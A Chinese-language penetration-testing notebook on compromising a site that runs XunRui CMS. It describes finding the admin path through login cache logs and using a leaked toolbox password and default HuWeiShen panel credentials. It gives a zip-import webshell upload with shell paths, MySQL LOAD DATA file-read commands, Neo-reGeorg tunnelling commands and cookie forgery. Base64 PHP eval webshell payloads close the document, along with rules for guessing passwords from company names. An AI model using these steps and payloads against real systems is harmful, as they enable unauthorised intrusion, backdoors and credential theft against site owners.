遇到个靶机是迅睿CMS :
后续补充:
一:后台地址
默认后台为/admin.php
遇到的靶机是/houtai.php
目标旁站存在备份 版本为5. 4,靶机也存在备份,版本为5.1
旁站情况:网站根目录下存在 /www.zip
里面数据库配置信息和后台地址都是假的,
/tool/login.php 是迅睿工具箱地址 这个的密码是 wangbiao88,登录进去可修改后台密码,后面找到后台后一样的密码。
第一步:找后台地址:
默认地址和扫目录没发现后台地址但发现个/houtai/的目录路径 就是没去试/houtai.php
/houtai.php 这个后台路径是在
/cache/log/202206/04.php (按照年月/日期)如果登录了不管成功和失败就会生成缓存文件,密码错误会记录错误的md5密码,不管成功失败都会记录显示用户名登录。我遇到成功了也记录了。
通过此文件成功找到后台地址。
默认用户名admin 密码就是泄露的迅睿工具箱源代码中的密码 \tool\config\pwd.php
二:旁站拿shell
后台拿shell:后台"应用"->“联动菜单”->"导入"处可上传zip文件
本地新建一个123文件夹 再建立一个123文件夹 再放入你的shell.php
压缩之后 --导入
shell路径:抓包会返回 目录 一般为
/cache/temp/linkage-import-file-1-1/123/123/shell.php
/cache/temp/linkage-import-file-1-2/123/123/shell.php
/cache/temp/linkage-import-file-1-3/123/123/shell.php
三:尝试提权
拿到webshell之后。护卫神,不支持aspx及aspx php很多马都杀,不能执行命令,反弹也执行不了。不能直接跨站,
mysql数据库低权限也不能都文件。
1. CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL );
2. load data local infile '//home//opendb.php' into table bbs;
3. LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0'; (转义用这个)
网上护卫神主机提权, 那个6588端口(直接访问是访问不到的需要做socks代理),php文件获取session 伪造cookie 3x版本应该可以,目标4x版本测试了不行。
过程:上传Neo-reGeorg
生成python neoreg.py generate -k pass@123 生成socks5 shell 上传目标服务器
python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php (本机执行)
安装Proxifier -- 127.0.0.1 1080 选择浏览器进程,范围为,内网ip或目标范围(本机配置)
浏览器输入 目标地址:6588 即可成功访问 护卫神 控制台
低版本默认 管理帐户:huweishen 管理密码:huweishen.com
高版本的是随机的强密码。
利用护卫神 那个php脚本获取到cookie是随机的,3x版本应该可以,4x不行。
修改cookies 可以使用浏览器cookies插件,也可以使用
浏览器 按F12 输入document.cookie 会显示cookies值
输入 document.cookie="获取到cookies 还有path值" 回车 F5刷新即可修改cookies了。
四:目标情况。
目标情况:网站根目录也存在备份/backupdata.zip 但是dedecms的信息,没啥用
其实:网站后台登录会记录内容写缓存到php文件,文件路径为:/cache/log/202206/04.php(按照年月/日期)闭合了但是被转义了,没能getshell,
按照别人总结的版本提示文件不存在,也没拿到shell,
迅睿工具箱地址也没有,后台是猜进去的。
按照旁站的版本,构造一样的包提示的,导入不能getshell 少导入那个upload模块。(旁站是import_upload) 这个版本没有只有import
旁站尽量搞.net的站点。
还有一个社工密码生成的规则。
公司名:如湘潭创荣经济发展集团有限公司 :密码就是chuangrou88 且存在用户名chuangrou
那么他可能的用户名有:
xtcf
xtcr
chuangfa
chuangrou
湘潭网丹互联网集团有限公司官网:密码就是wangdan88
wdjt
wangdan
xtwd
根据关键字组合去生成弱口令字典
补充:PHP文件上传绕过-死亡exit.txt
https://www.equinox.chat/archives/28/
payload1:
txt=aPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=convert.base64-decode/resource=shell.php
payload2:
txt=PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php